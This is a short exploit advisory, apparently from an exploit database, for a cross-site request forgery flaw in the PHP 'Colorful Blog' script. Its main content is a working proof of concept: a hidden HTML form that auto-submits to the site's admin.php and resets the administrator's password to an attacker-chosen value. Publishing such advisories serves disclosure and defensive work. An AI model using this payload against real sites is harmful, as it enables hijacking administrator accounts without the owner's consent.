Colorful Blog Cross Site Request Forgery

2016.10.14
Credit: Besim
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title :----------- : Colorful Blog - Cross-Site Request Forgery (Change Admin Pass) # Author :------------------ : Besim # Google Dork :---------- : - # Date :--------------------- : 13/10/2016 # Type :--------------------- : webapps # Platform :---------------- : PHP # Vendor Homepage :-- : - # Software link :---------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html Description : You can change admin's password with CSRF, if you know admin's username ########################### CSRF PoC ############################### <html> <!-- CSRF PoC --> <body> <form action="http://site_name/path/yonetim/admin.php" method="POST"> <input type="hidden" name="username" value="admin_username" /> <input type="hidden" name="password" value="besim" /> <input type="hidden" name="gonder" value="Kaydet" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top